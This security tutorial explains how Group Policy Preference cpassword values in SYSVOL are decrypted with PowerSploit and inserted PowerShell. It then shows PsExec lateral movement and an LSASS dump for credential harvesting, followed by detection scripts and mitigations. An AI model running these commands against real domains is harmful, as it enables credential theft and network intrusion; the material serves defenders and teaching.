Plaintext Password Extraction using PowerSploit
Group Policy is essential in managing an Active Directory environment. Administrators use it to centrally manage the configuration of domain-joined servers and workstations. Group Policy Objects define both policies (enforced settings that users cannot change) and preferences (default configurations that a user can later modify).
Unfortunately, Group Policy Preferences let administrators embed passwords in preferences that create or modify local users and groups, map network drives, and define scheduled tasks, services and data sources. Each such password is stored in a cpassword attribute inside the preference's XML file on the SYSVOL share, encrypted with AES under a single 32-byte key that Microsoft itself published in the MS-GPPREF protocol documentation. Because every authenticated domain user can read SYSVOL, any adversary with a domain account can read these files and decrypt the passwords.
In May 2014 Microsoft released security update MS14-025 (CVE-2014-1812), which removes the ability to create new preferences with embedded passwords. The update does not touch preferences that already exist, so many organizations still have Group Policy preferences with embedded passwords sitting in SYSVOL.
Attack Tutorial: Plaintext Password Extraction Attack
An adversary can search the SYSVOL share by hand for preference XML files that carry the attribute CPassword, which contains the encrypted password; adjacent attributes provide other details, such as the username. Alternatively, they can use a tool like PowerSploit's Get-GPPPassword cmdlet to automate finding and decrypting these passwords, as shown below.
PS> Import-Module PowerSploit
PS> Get-GPPPassword
Changed : {2020-08-17 11:14:01}
UserNames : {Administrator (built-in)}
NewName : [BLANK]
Passwords : {WhatAGreatPassword123!}
File : \\domain.com\SYSVOL\domain.com\Policies\{5AC5C2A3-B893-493E-B03A-D6F9E8BCC8CB}\Machine\Preferences\Groups\Groups.xml
PS>
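The following is an added example, not code from the original page or from PowerSploit, that writes out the decryption Get-GPPPassword performs so the mechanism is visible: restore the base64 padding the editor stripped, decrypt with AES-256-CBC under the key Microsoft published in MS-GPPREF section 2.2.1.1.4 and an all-zero IV, then decode the UTF-16LE plaintext. The sample ciphertext is the cpassword value from the Groups.xml on this page; the round-trip probe string is constructed. It also shows the reverse direction, because the same key lets anyone produce a valid cpassword, not only read one.

```powershell
# Added example (not from the page or PowerSploit): GPP cpassword decryption and encryption.
# Requires Windows PowerShell 5.1 or PowerShell 7; no modules needed.

# 32-byte AES-256 key from MS-GPPREF 2.2.1.1.4. Every domain in the world uses this same key.
$GPPKey = [byte[]](0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
                   0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)

function New-GPPAes {
    # AES-256-CBC, PKCS7 padding, and a fixed all-zero IV.
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key     = $GPPKey
    $aes.IV      = New-Object byte[] 16
    return $aes
}

function ConvertFrom-GPPCPassword {
    param([Parameter(Mandatory)][string]$CPassword)
    # The preference editor strips trailing '=' padding from the base64 text; put it back.
    $remainder = $CPassword.Length % 4
    if ($remainder -eq 1) { throw "cpassword '$CPassword' is not valid base64" }
    $padded = $CPassword + ('=' * ((4 - $remainder) % 4))
    $cipher = [Convert]::FromBase64String($padded)
    $aes = New-GPPAes
    try     { $plain = $aes.CreateDecryptor().TransformFinalBlock($cipher, 0, $cipher.Length) }
    finally { $aes.Dispose() }
    # The password was encoded as UTF-16LE before encryption.
    return [System.Text.Encoding]::Unicode.GetString($plain)
}

function ConvertTo-GPPCPassword {
    # The reverse direction, as the GPP editor produced the stored value.
    param([Parameter(Mandatory)][string]$Password)
    $bytes = [System.Text.Encoding]::Unicode.GetBytes($Password)
    $aes = New-GPPAes
    try     { $cipher = $aes.CreateEncryptor().TransformFinalBlock($bytes, 0, $bytes.Length) }
    finally { $aes.Dispose() }
    return ([Convert]::ToBase64String($cipher)).TrimEnd('=')
}

# Round trip with a constructed value: confirms key, mode, IV and encoding without relying on the sample.
$probe = 'Constructed-Probe-1!'
if ((ConvertFrom-GPPCPassword (ConvertTo-GPPCPassword $probe)) -ne $probe) { throw 'GPP round trip failed' }

# cpassword value taken from the Groups.xml shown on this page.
$sample = 'Pe81R/eXjjPtd5oJw6D0hifqz78ezVt7tD0ViS9eTg+z2dKIvfwMRbD5JPFEA26i'
ConvertFrom-GPPCPassword -CPassword $sample
```

The last line prints the plaintext for the page's sample; it should match what Get-GPPPassword reported for the same Groups.xml in the transcript above. Nothing in the scheme is secret except the ciphertext location, which every authenticated user can read, so there is no configuration that makes an existing cpassword safe; the only fix is to remove it and rotate the account.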
With this list, the adversary can continue to expand their footprint within the organization. In this example, the adversary reads the GPO's links to find the computers the preference applied to, authenticates to one of them with the recovered local administrator password, and creates a memory dump of the LSASS.exe process to harvest further credentials for lateral movement or privilege escalation. The procdump command at the end runs inside the PowerShell session that PsExec opened on Server1.
PS> [XML] $XML = Get-GPO -Guid 5AC5C2A3-B893-493E-B03A-D6F9E8BCC8CB | Get-GPOReport -ReportType Xml
PS> $XML.GPO.LinksTo
SOMName SOMPath Enabled NoOverride
------- ------- ------- ----------
Comp domain.com/Comp true false
PS> $OUName = $XML.GPO.LinksTo.SOMName
PS> $DN = Get-ADOrganizationalUnit -Filter "Name -eq '$OUName'" | Select-Object -ExpandProperty DistinguishedName
PS> Get-ADComputer -filter "*" -SearchBase $DN
DistinguishedName : CN=Server1,OU=Comp,DC=domain,DC=com
DNSHostName :
Enabled : True
Name : Server1
ObjectClass : computer
ObjectGUID : 4eeec15e-ee84-4195-b5c8-ee4d5d67efbf
SamAccountName : SERVER1$
SID : S-1-5-21-5840559-2756745051-1363507867-16924
UserPrincipalName :
PS> .\PSExec.exe -u Administrator -p WhatAGreatPassword123! \\server1 powershell.exe
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
PS> procdump.exe -accepteula -r -ma lsass.exe lsass.dmp
PS>
Detect, Mitigate and Respond
Running PowerSploit's Get-GPPPassword cmdlet against each domain will enumerate embedded passwords (note that this also reveals the plaintext, so the output itself must be handled as a secret). Alternatively, the following PowerShell snippet will enumerate embedded passwords without decrypting them. Select-String matches case-insensitively by default, so it catches cpassword in any capitalization. The matched lines still contain the ciphertext, which anyone can decrypt with the public key, so treat this output as sensitive too:
# Replace this path with the path to SYSVOL to check
$SYSVOL_Path = "\\domain.com\sysvol"
Get-ChildItem $SYSVOL_Path -Recurse -File | Select-String -Pattern "cpassword"
# Sample Output using \\domain.com\sysvol
\\domain.com\sysvol\domain.com\Policies\{5AC5C2A3-B893-493E-B03A-D6F9E8BCC8CB}\Machine\Preferences\Groups\Groups.xml:2:<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator (built-in)" image="2" changed="2020-08-17 11:14:01" uid="{EA0FCA83-45D2-4189-B476-DB595FB29E2D}"><Properties action="U" newName="" fullName="" description="Built-in Local Admin" cpassword="Pe81R/eXjjPtd5oJw6D0hifqz78ezVt7tD0ViS9eTg+z2dKIvfwMRbD5JPFEA26i" changeLogon="0" noChange="0" neverExpires="0" acctDisabled="0" subAuthority="RID_ADMIN" userName="Administrator (built-in)"/></User>
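A structured version of that audit, as an added example that is not part of the original page: it walks the Policies folder, parses every Preferences XML file (Groups, Drives, ScheduledTasks, Services, DataSources and so on), and reports each element that carries a cpassword attribute together with the policy GUID, scope and account, without decrypting or printing the ciphertext, so the findings can be handed to GPO owners. It assumes read access to SYSVOL and, for GUID-to-name resolution only, that the RSAT GroupPolicy module (Get-GPO) is installed; without it the name column is left empty. The offline demonstration at the end writes a copy of this page's Groups.xml into a constructed temporary folder and scans that.

```powershell
# Added example, not code from the original page: report GPP elements with a cpassword attribute.
function Find-GPPCPassword {
    [CmdletBinding()]
    param(
        # Root of the Policies folder to scan, e.g. \\domain.com\SYSVOL\domain.com\Policies
        [Parameter(Mandatory)][string]$PoliciesPath
    )
    # Name resolution is optional: Get-GPO comes from the RSAT GroupPolicy module (assumption).
    $hasGpoModule = [bool](Get-Command Get-GPO -ErrorAction SilentlyContinue)
    $files = Get-ChildItem -Path $PoliciesPath -Recurse -File -Filter *.xml -ErrorAction SilentlyContinue |
             Where-Object { $_.FullName -like '*\Preferences\*' }
    foreach ($file in $files) {
        try { [xml]$doc = Get-Content -LiteralPath $file.FullName -Raw -ErrorAction Stop }
        catch { Write-Warning "Skipping unreadable or malformed file $($file.FullName): $_"; continue }

        # Policy GUID and scope come from the path: Policies\{GUID}\Machine|User\Preferences\...
        $gpoGuid = if ($file.FullName -match '\{([0-9A-Fa-f-]{36})\}') { $Matches[1] } else { $null }
        $scope   = if ($file.FullName -like '*\Machine\*') { 'Machine' }
                   elseif ($file.FullName -like '*\User\*') { 'User' } else { 'Unknown' }
        $gpoName = $null
        if ($gpoGuid -and $hasGpoModule) {
            $gpoName = (Get-GPO -Guid $gpoGuid -ErrorAction SilentlyContinue).DisplayName
        }

        # Any element at any depth with a cpassword attribute (the Properties node under User, Drive, Task, ...).
        foreach ($node in $doc.SelectNodes('//*[@cpassword]')) {
            # Preference types name the account differently; PowerShell's XML property access is case-insensitive.
            $account = $null
            foreach ($attr in 'userName', 'accountName', 'runAs') {
                if ($node.$attr) { $account = $node.$attr; break }
            }
            [pscustomobject]@{
                GpoName         = $gpoName
                GpoGuid         = $gpoGuid
                Scope           = $scope
                PreferenceType  = $node.ParentNode.ParentNode.LocalName   # e.g. Groups, Drives, ScheduledTasks
                Element         = $node.ParentNode.LocalName              # e.g. User, Drive, Task
                Account         = $account
                Changed         = $node.ParentNode.changed
                CPasswordLength = $node.cpassword.Length                  # length only; the value stays out of reports
                File            = $file.FullName
            }
        }
    }
}

# Offline demonstration against a constructed copy of the Groups.xml shown on this page.
$demoRoot = Join-Path ([IO.Path]::GetTempPath()) 'gpp-audit-demo'
$demoFile = Join-Path $demoRoot '{5AC5C2A3-B893-493E-B03A-D6F9E8BCC8CB}\Machine\Preferences\Groups\Groups.xml'
New-Item -ItemType Directory -Path (Split-Path $demoFile) -Force | Out-Null
@'
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator (built-in)" image="2" changed="2020-08-17 11:14:01" uid="{EA0FCA83-45D2-4189-B476-DB595FB29E2D}"><Properties action="U" newName="" fullName="" description="Built-in Local Admin" cpassword="Pe81R/eXjjPtd5oJw6D0hifqz78ezVt7tD0ViS9eTg+z2dKIvfwMRbD5JPFEA26i" changeLogon="0" noChange="0" neverExpires="0" acctDisabled="0" subAuthority="RID_ADMIN" userName="Administrator (built-in)"/></User></Groups>
'@ | Set-Content -LiteralPath $demoFile -Encoding UTF8
Find-GPPCPassword -PoliciesPath $demoRoot | Format-List

# Against a real domain (assumed path), e.g.:
# Find-GPPCPassword -PoliciesPath '\\domain.com\SYSVOL\domain.com\Policies' | Format-Table GpoName, Scope, PreferenceType, Account, Changed -AutoSize
```

Run it from a domain-joined host as an ordinary domain user: that is exactly the access an adversary has, so anything it finds is already exposed. The Changed timestamp tells you how long the credential has been sitting in SYSVOL, which is the window in which it must be assumed compromised.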
- Ensure that all domain controllers, and every workstation where the Group Policy Management Console or RSAT is used to edit policy, are running current operating system versions with the latest patches, since the patched Group Policy Preference editor no longer permits embedding passwords.
- Replace the use of Group Policy preferences to set the built-in local administrator account’s password with a robust solution like Microsoft’s Local Administrator Password Solution (LAPS).
- Adopt solutions that replace embedded passwords with authenticated dynamic lookups.
- Remove the embedded password from the Group Policy preference, then confirm that no cpassword attribute remains in SYSVOL; removing the preference does not change the passwords it already set on machines.
- Reset the password for the account on every machine the preference applied to, since the same value was set everywhere and must be assumed compromised.
MITRE ATT&CK® and ATT&CK® are registered trademarks of The MITRE Corporation.